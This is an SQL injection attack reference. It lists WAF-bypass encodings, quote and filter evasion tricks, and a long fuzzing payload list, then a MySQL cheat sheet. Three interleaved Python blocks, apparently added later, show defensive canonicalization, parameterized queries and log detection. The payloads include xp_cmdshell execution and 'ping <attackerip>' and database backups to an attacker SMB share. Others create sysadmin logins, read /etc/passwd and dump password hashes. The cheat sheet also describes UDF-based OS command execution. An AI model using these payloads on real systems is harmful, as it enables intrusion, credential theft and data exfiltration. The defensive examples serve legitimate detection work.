SQL INJECTION BYPASS WAF
1. Whitespace substitutes
%09 : tab
%0a : line feed
%0b : vertical tab
%0c : form feed
%0d : carriage return
+ : equivalent to a space
/**/ : comment; arbitrary text can be placed inside it
2. Avoiding filtered syntax
() : parentheses
concat : string concatenation
1. Whitespace bypass
1) Line Feed (\n)
- Newline character that moves the cursor (caret) to the next line (directly below the current position)
- URL Encoding: %0a
- ex) no=1%0aor%0aid='admin'
2) Tab (\t)
- Moves the cursor forward by one tab stop
- URL Encoding: %09
- ex) no=1%09or%09id='admin'
3) Carriage Return (\r)
- Newline character that moves the cursor (caret) to the beginning (left edge) of the line
- URL Encoding: %0d
- ex) no=1%0dor%0did='admin'
4) Comment (/**/)
- ex) no=1/**/or/**/id='admin'
5) Parentheses ()
- ex) no=(1)or(id='admin')
6) Plus (+)
- ex) no=1+or+id='admin'
7) %0b, %0c, %a0
- Used in place of a space when none of methods 1 through 6 work
- %a0 does not seem to work reliably, so rely mainly on %0b and %0c.
2. Logical operator and comparison operator bypass
1) OR operator
- ||
2) AND operator
- &&
- URL Encoding: %26%26
3) Equals sign (=)
① LIKE operator
- ex) id like "admin"
- LIKE wildcard patterns can also be used to shape the query (ex. pw like "a%" → true if the first character of pw is a)
② IN operator
- ex) id in ("admin")
③ instr(string $str, string $substr)
- ex) instr(id, "admin")
④ Inequality operators (<, >)
- ex) length(pw) > 7 and length(pw) < 9
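Every substitute in sections 1 and 2 defeats a filter that matches one literal spelling of a pattern, which is why the defensive counterpart is to canonicalize the parameter before matching anything. The Python below is an added example written for this page, not code from the original post: it URL-decodes a query-string value, folds the listed whitespace substitutes (tab, LF, VT, FF, CR, %a0, +, /**/ and parentheses) into single spaces, and then applies one simple check for a boolean connective followed by a comparison, including the ||, &&, like, in, instr and <, > substitutes. The sample inputs are constructed from the ex) lines above; the detection pattern is illustrative, not a complete WAF rule set.

```python
import re
from urllib.parse import unquote_plus

# Whitespace substitutes from section 1: tab, LF, VT, FF, CR, NBSP (%a0) and /* */ comments.
# '+' is handled by unquote_plus, which turns it into a space.
WHITESPACE_SUBSTITUTES = re.compile(r"[\t\n\x0b\x0c\r\xa0]+|/\*.*?\*/", re.DOTALL)

# Operator substitutes from section 2: ||, &&, and like/in/instr/</> standing in for '='.
TAUTOLOGY_CHECK = re.compile(
    r"\|\||&&|\b(?:or|and)\b.*?(?:=|<|>|\blike\b|\bin\b|\binstr\b)"
)


def canonicalize(raw_param: str) -> str:
    """Reduce a raw query-string value to one spelling before any pattern matching.

    latin-1 decoding keeps %a0 as a single NBSP character instead of a
    replacement character, so it can be folded like the other whitespace forms.
    """
    decoded = unquote_plus(raw_param, encoding="latin-1")
    folded = WHITESPACE_SUBSTITUTES.sub(" ", decoded)
    folded = re.sub(r"[()]", " ", folded)  # parentheses used as separators (method 5)
    return re.sub(r"\s+", " ", folded).strip().lower()


def looks_like_sqli(raw_param: str) -> bool:
    """Illustrative check: boolean connective followed by a comparison, after canonicalization."""
    return TAUTOLOGY_CHECK.search(canonicalize(raw_param)) is not None


# Constructed inputs mirroring the ex) lines in sections 1 and 2 (not captured traffic).
SAMPLE_PAYLOADS = [
    "1%0aor%0aid='admin'",          # line feed
    "1%09or%09id='admin'",          # tab
    "1%0dor%0did='admin'",          # carriage return
    "1/**/or/**/id='admin'",        # comment
    "(1)or(id='admin')",            # parentheses
    "1+or+id='admin'",              # plus
    "1%0bor%0bid='admin'",          # vertical tab
    "1%0cor%0cid='admin'",          # form feed
    "1%a0or%a0id='admin'",          # NBSP
    "1%26%261%3D1",                 # && in place of and
    "1||id%09like%09%22admin%22",   # || and like in place of or and =
]
SAMPLE_BENIGN = ["42", "hello+world", "order+by+date", "salt+and+pepper", "john.doe%40example.com"]


if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS + SAMPLE_BENIGN:
        print(f"{p!r:35} -> {canonicalize(p)!r:28} flagged={looks_like_sqli(p)}")
```

The point of the canonicalization step is that one rule written against the folded form covers all nine whitespace variants at once; a filter that only strips literal spaces has to enumerate each encoding separately and will miss the next one.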
3. Function bypass
1) str_replace(string $search, string $replace, string $subject)
- Place the filtered string inside a copy of itself.
- ex) str_replace("admin", "", $_GET[id])
→ Entering adadminmin removes the admin in the middle and leaves admin behind.
2) substr(string $str, int $start, int $length)
- substring(string $str, int $start, int $length)
- mid(string $str, int $start, int $length)
3) ascii(string $str)
- ord(string $str): like ascii(), converts a character to its ASCII code value
- hex(string $str): converts a string to its ASCII hex value
ex) hex(substr(pw, 1, 1)) = hex(61)
4. Comments
① --
- Must be followed by a space to work as a comment.
- Comments out a single line only.
② # (URL Encoding: %23)
- Unlike '--', works as a comment even without a trailing space.
- Comments out a single line only.
③ /* */
- Everything between /* and */ is commented out.
④ ;%00
- Comment terminator formed by combining ; with the NULL character %00
5. Single quote (') bypass
1) Use double quotes (")
ex) id="admin"
2) Use a backslash (\)
- Usable only in limited cases, e.g. a query of the form select id from table where id='$_GET[id]' and pw='$_GET[pw]'
- ex) id='\' and pw=' or 1#' → the backslash makes the single quote (') immediately after it be read as a literal character
☞ '\' and pw' is then read as one string literal, and everything after it is read as query syntax
☞ Passing the parameters: id=\&pw=%20or%201%23
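The str_replace trick in section 3 and the backslash trick in section 5 share one root cause: the application edits user input and then concatenates it into SQL text. The Python below is an added example written for this page, not the original author's code. It reproduces the single-pass filter and the string-built query from those sections, shows the recursive-strip alternative, and contrasts both with a parameterized query plus an explicit policy check against a constructed in-memory SQLite users table (the table name, columns and rows are assumptions made for the demo). One caveat: SQLite does not treat \ as an escape character or # as a comment, so the vulnerable query is only assembled as a string for inspection here, not executed; the MySQL behaviour described above is not reproduced.

```python
import sqlite3
from typing import Optional


def naive_filter(value: str) -> str:
    """Mirrors PHP str_replace("admin", "", $_GET[id]): a single, non-recursive pass."""
    return value.replace("admin", "")


def strip_until_stable(value: str, banned: str = "admin") -> str:
    """Repeat the removal until the banned token can no longer re-form from the pieces."""
    while banned in value:
        value = value.replace(banned, "")
    return value


def build_query_unsafe(user_id: str, pw: str) -> str:
    """Assemble the query text exactly as the concatenating PHP in section 5 would.

    Returned as a string for inspection only; never executed in this example.
    """
    return f"select id from table where id='{user_id}' and pw='{pw}'"


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table; the rows are sample data, not taken from the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("guest", "guest")])
    return conn


def safe_lookup(conn: sqlite3.Connection, user_id: str, pw: str) -> Optional[str]:
    """Parameter binding plus an explicit policy check instead of input mangling.

    Quotes, backslashes and '#' inside the values stay literal data, so neither
    the adadminmin trick nor the id=\\ trick can change the statement's shape.
    """
    if user_id.lower() == "admin":  # enforce 'no admin login' as a rule, not as a string edit
        return None
    row = conn.execute(
        "SELECT id FROM users WHERE id = ? AND pw = ?", (user_id, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(naive_filter("adadminmin"))              # admin  (filter bypassed)
    print(repr(strip_until_stable("adadminmin")))  # ''     (nothing left to smuggle through)
    print(build_query_unsafe("\\", " or 1#"))      # the broken statement from section 5
    db = demo_db()
    print(safe_lookup(db, "\\", " or 1#"))         # None
    print(safe_lookup(db, "guest", "guest"))       # guest
```

Recursive stripping closes the adadminmin gap but still rewrites user data silently; rejecting the request, or binding the value and deciding the policy in code as safe_lookup does, is the fix that does not depend on guessing every encoding an attacker might use.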
First - AND
1) &&
- URL encoding: %26%26
Second - OR
1) ||
Third - Equals sign (=)
1) like operator
- Used the same way as the equals sign
- Additionally, forms such as pw like "a%", "%a%", "%a" can be used in queries.
Returns true as long as a appears in the string
(in order: when the first character is a, when a appears anywhere in the string, when the last character is a)
2) in operator
- Replace the equals sign with in and wrap the value in ()
- ex) pw in ("1234")
3) instr function
- ex) instr(id,"admin")
4) Inequality operators (<, >)
- Express the equality as a pair of inequalities instead
- ex) length(pw) = 8 ---> length(pw) > 7 and length(pw) < 9
[URL Encoding Table]
Character | URL Encoding
Space | %20
( | %28
: | %3A
[ | %5B
` | %60
! | %21
) | %29
; | %3B
\ | %5C
{ | %7B
" | %22
* | %2A
< | %3C
] | %5D
| | %7C
# | %23
+ | %2B
= | %3D
^ | %5E
} | %7D
$ | %24
, | %2C
> | %3E
_ | %5F
~ | %7E
% | %25
- | %2D
? | %3F
& | %26
. | %2E
@ | %40
' | %27
/ | %2F
[ASCII Code Table]
Decimal | Hex | Char | Decimal | Hex | Char | Decimal | Hex | Char | Decimal | Hex | Char |
0 | 0x00 | NUL | 32 | 0x20 | Space | 64 | 0x40 | @ | 96 | 0x60 | ` |
1 | 0x01 | SOH | 33 | 0x21 | ! | 65 | 0x41 | A | 97 | 0x61 | a |
2 | 0x02 | STX | 34 | 0x22 | " | 66 | 0x42 | B | 98 | 0x62 | b |
3 | 0x03 | ETX | 35 | 0x23 | # | 67 | 0x43 | C | 99 | 0x63 | c |
4 | 0x04 | EOT | 36 | 0x24 | $ | 68 | 0x44 | D | 100 | 0x64 | d |
5 | 0x05 | ENQ | 37 | 0x25 | % | 69 | 0x45 | E | 101 | 0x65 | e |
6 | 0x06 | ACK | 38 | 0x26 | & | 70 | 0x46 | F | 102 | 0x66 | f |
7 | 0x07 | BEL | 39 | 0x27 | ' | 71 | 0x47 | G | 103 | 0x67 | g |
8 | 0x08 | BS | 40 | 0x28 | ( | 72 | 0x48 | H | 104 | 0x68 | h |
9 | 0x09 | TAB | 41 | 0x29 | ) | 73 | 0x49 | I | 105 | 0x69 | i |
10 | 0x0A | LF | 42 | 0x2A | * | 74 | 0x4A | J | 106 | 0x6A | j |
11 | 0x0B | VT | 43 | 0x2B | + | 75 | 0x4B | K | 107 | 0x6B | k |
12 | 0x0C | FF | 44 | 0x2C | , | 76 | 0x4C | L | 108 | 0x6C | l |
13 | 0x0D | CR | 45 | 0x2D | - | 77 | 0x4D | M | 109 | 0x6D | m |
14 | 0x0E | SO | 46 | 0x2E | . | 78 | 0x4E | N | 110 | 0x6E | n |
15 | 0x0F | SI | 47 | 0x2F | / | 79 | 0x4F | O | 111 | 0x6F | o |
16 | 0x10 | DLE | 48 | 0x30 | 0 | 80 | 0x50 | P | 112 | 0x70 | p |
17 | 0x11 | DC1 | 49 | 0x31 | 1 | 81 | 0x51 | Q | 113 | 0x71 | q |
18 | 0x12 | DC2 | 50 | 0x32 | 2 | 82 | 0x52 | R | 114 | 0x72 | r |
19 | 0x13 | DC3 | 51 | 0x33 | 3 | 83 | 0x53 | S | 115 | 0x73 | s |
20 | 0x14 | DC4 | 52 | 0x34 | 4 | 84 | 0x54 | T | 116 | 0x74 | t |
21 | 0x15 | NAK | 53 | 0x35 | 5 | 85 | 0x55 | U | 117 | 0x75 | u |
22 | 0x16 | SYN | 54 | 0x36 | 6 | 86 | 0x56 | V | 118 | 0x76 | v |
23 | 0x17 | ETB | 55 | 0x37 | 7 | 87 | 0x57 | W | 119 | 0x77 | w |
24 | 0x18 | CAN | 56 | 0x38 | 8 | 88 | 0x58 | X | 120 | 0x78 | x |
25 | 0x19 | EM | 57 | 0x39 | 9 | 89 | 0x59 | Y | 121 | 0x79 | y |
26 | 0x1A | SUB | 58 | 0x3A | : | 90 | 0x5A | Z | 122 | 0x7A | z |
27 | 0x1B | ESC | 59 | 0x3B | ; | 91 | 0x5B | [ | 123 | 0x7B | { |
28 | 0x1C | FS | 60 | 0x3C | < | 92 | 0x5C | \ | 124 | 0x7C | | |
29 | 0x1D | GS | 61 | 0x3D | = | 93 | 0x5D | ] | 125 | 0x7D | } |
30 | 0x1E | RS | 62 | 0x3E | > | 94 | 0x5E | ^ | 126 | 0x7E | ~ |
31 | 0x1F | US | 63 | 0x3F | ? | 95 | 0x5F | _ | 127 | 0x7F | DEL |
SQL Injection Payloads
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
# you will need to customize/modify some of the values in the queries for best effect
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' grant connect to name; grant resource to name; --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
)%20or%20('x'='x
%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
update
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
delete
like
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
or 0=0 --
1 waitfor delay '0:0:10'--
or 'a'='a
hi or 1=1 --"
or a = a
UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
or 1=1
or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
and 1 in (select var from temp)--
or '7659'='7659
or 'text' = n'text'
--
or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
or 1=1--
and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
union all select @@version--
,@variable
(sqlattempt2)
or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
union select
or sleep(__TIME__)#
select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
or 2 between 1 and 3
or a=a--
or '1'='1
|
or sleep(__TIME__)='
or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
â or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
having 1=1--
) or benchmark(10000000,MD5(1))#
or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
or 'text' > 't'
(select top 1
or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
-- &password=
group by userid having 1=1--
or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
'%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
or 1 in (select @@version)--
sqlvuln;
union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
â or 3=3 --
@variable
or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
or 1/*
!
'
or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
or 3=3 --
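For a defender the list above is mostly useful as a source of signatures: the time-delay family (sleep, pg_sleep, benchmark, waitfor delay) and the stacked-query family (; exec, xp_cmdshell, xp_regread) recur throughout it and almost never appear in legitimate parameters. The Python below is an added example for this page, not part of the original list: it parses a few constructed access-log lines in an assumed ip "METHOD path" status format, URL-decodes each query parameter, and reports which family, if any, each request matches. The log lines, IP addresses and paths are all made up for the demo.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the page or any real server):
# client_ip "METHOD path" status
SAMPLE_LOG = """\
10.0.0.5 "GET /item?id=1%20waitfor%20delay%20'0:0:10'--" 200
10.0.0.6 "GET /item?id=42" 200
10.0.0.7 "GET /login?user=admin'%20or%20sleep(5)%23" 200
10.0.0.8 "GET /search?q=benchmark%20results" 200
10.0.0.9 "GET /item?id=1;%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--" 500
"""

LOG_LINE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3})$')

# Two payload families that recur in the list above; both are rare in legitimate parameters.
# The function names require a following '(' so that ordinary words like "benchmark" do not match.
FAMILIES = {
    "time-delay": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "stacked-exec": re.compile(r";\s*exec\b|\bxp_cmdshell\b|\bxp_regread\b", re.I),
}


def classify_query(path: str) -> list:
    """Decode every parameter value in the URL and return the families it matches."""
    query = urlsplit(path).query
    found = []
    # parse_qsl decodes %XX and '+' and splits only on '&', so a ';' inside a value survives
    for _, value in parse_qsl(query, keep_blank_values=True):
        for name, pattern in FAMILIES.items():
            if pattern.search(value) and name not in found:
                found.append(name)
    return found


def scan_log(text: str) -> list:
    """Return (client_ip, family, path) for each request that matches a family."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip unparseable lines rather than abort the whole scan
        ip, _method, path, _status = m.groups()
        for family in classify_query(path):
            findings.append((ip, family, path))
    return findings


if __name__ == "__main__":
    for ip, family, path in scan_log(SAMPLE_LOG):
        print(f"{ip:10} {family:13} {path}")
```

Decoding before matching matters here for the same reason as in the whitespace section: the raw log line contains %20 and %23, and a pattern written against the undecoded text would need a variant for every encoding. In a real deployment the time-delay family is also worth correlating with response latency, since a hit on a slow request is far stronger evidence than the string alone.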
MySQL cheat sheet
Item | Query
Version | SELECT @@version
Comments | SELECT 1; #comment
         | SELECT /*comment*/1;
Current User | SELECT user();
             | SELECT system_user();
List Users | SELECT user FROM mysql.user; -- priv
List Password Hashes | SELECT host, user, password FROM mysql.user; -- priv
Password Cracker | John the Ripper will crack MySQL password hashes.
List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
                | SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
                | SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
                | SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
                  | SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database | SELECT database()
List Databases | SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
               | SELECT distinct(db) FROM mysql.db -- priv
List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'
Select Nth Row | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
               | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char | SELECT substr('abcd', 3, 1); # returns c
Bitwise AND | SELECT 6 & 2; # returns 2
            | SELECT 6 & 1; # returns 0
ASCII Value -> Char | SELECT char(65); # returns A
Char -> ASCII Value | SELECT ascii('A'); # returns 65
Casting | SELECT cast('1' AS unsigned integer);
        | SELECT cast('123' AS char);
String Concatenation | SELECT CONCAT('A','B'); # returns AB
                     | SELECT CONCAT('A','B','C'); # returns ABC
If Statement | SELECT if(1=1,'foo','bar'); -- returns 'foo'
Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes | SELECT 0x414243; # returns ABC
Time Delay | SELECT BENCHMARK(1000000,MD5('A'));
           | SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests | Impossible?
Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access | ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
                  | SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
Hostname, IP Address | SELECT @@hostname;
Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
Delete Users | DROP USER test1; -- priv
Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
Location of DB files | SELECT @@datadir;
Default/System Databases | information_schema (>= mysql 5.0)
                         | mysql